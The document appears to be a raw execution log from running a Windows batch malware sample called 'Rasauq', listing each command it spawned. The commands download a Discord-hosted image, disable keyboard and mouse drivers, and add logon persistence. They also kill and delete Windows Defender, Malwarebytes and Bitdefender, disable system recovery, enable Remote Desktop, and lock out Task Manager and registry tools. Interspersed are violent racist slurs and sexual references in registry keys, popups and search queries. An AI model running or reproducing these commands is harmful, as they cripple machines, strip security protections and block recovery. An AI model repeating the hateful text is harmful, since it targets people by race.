C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"
C:\Windows\system32\openfiles.exe
openfiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "(new-object -com shell.application).minimizeall()"
C:\Windows\system32\curl.exe
curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
C:\Windows\system32\ReAgentc.exe
reagentc /disable
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Recovery /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue {default} recoveryenabled
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableAntiTamper $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbam.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM MBAMService.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamtray.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM mbamscheduler.exe /T
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\sc.exe
sc delete MBAMService
C:\Windows\system32\sc.exe
sc stop MBAMProtector
C:\Windows\system32\sc.exe
sc delete MBAMProtector
C:\Windows\system32\sc.exe
sc stop MBAMChameleon
C:\Windows\system32\sc.exe
sc delete MBAMChameleon
C:\Windows\system32\sc.exe
sc stop MBAMFarflt
C:\Windows\system32\sc.exe
sc delete MBAMFarflt
C:\Windows\system32\sc.exe
sc stop MBAMSwissArmy
C:\Windows\system32\sc.exe
sc delete MBAMSwissArmy
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdservicehost.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdagent.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdredline.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdparentalservice.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdreinit.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM bdsubwiz.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM seccenter.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM vsserv.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM epssecurityservice.exe /T
C:\Windows\system32\sc.exe
sc stop bdservicehost
C:\Windows\system32\sc.exe
sc delete bdservicehost
C:\Windows\system32\sc.exe
sc stop bdagent
C:\Windows\system32\sc.exe
sc delete bdagent
C:\Windows\system32\sc.exe
sc stop bdredline
C:\Windows\system32\sc.exe
sc delete bdredline
C:\Windows\system32\sc.exe
sc stop bdparentalservice
C:\Windows\system32\sc.exe
sc delete bdparentalservice
C:\Windows\system32\sc.exe
sc stop bdreinit
C:\Windows\system32\sc.exe
sc delete bdreinit
C:\Windows\system32\sc.exe
sc stop bdsubwiz
C:\Windows\system32\sc.exe
sc delete bdsubwiz
C:\Windows\system32\sc.exe
sc stop seccenter
C:\Windows\system32\sc.exe
sc delete seccenter
C:\Windows\system32\sc.exe
sc stop vsserv
C:\Windows\system32\sc.exe
sc delete vsserv
C:\Windows\system32\sc.exe
sc stop epssecurityservice
C:\Windows\system32\sc.exe
sc delete epssecurityservice
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc delete WinDefend
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\taskkill.exe
taskkill /F /IM MsMpEng.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM MpCmdRun.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM SecurityHealthSystray.exe /T
C:\Windows\system32\taskkill.exe
taskkill /F /IM smartscreen.exe /T
C:\Windows\system32\takeown.exe
takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Windows Defender" /r /d y
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\notepad.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\calc.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
C:\Windows\system32\powercfg.exe
powercfg /hibernate off REM Disables hibernation
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
C:\Windows\system32\powercfg.exe
powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "Device Name"
C:\Windows\system32\powercfg.exe
powercfg /devicedisablewake "USB Root Hub"
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCR\behead all niggers" /f
C:\Windows\system32\reg.exe
reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg query "HKU" /s /f "Software" /k
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\AppDataLow\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
C:\Windows\system32\reg.exe
reg add "End of search: 26 match(es) found.\Software\Rasauq on top" /f
C:\Windows\system32\msg.exe
msg * /time:3 "This machine has been compromised by Rasuaq"
C:\Windows\system32\timeout.exe
timeout /t 3 /nobreak
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x25c,0x7ffb56a1f208,0x7ffb56a1f214,0x7ffb56a1f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1988,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=1980 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=2552 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5020,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
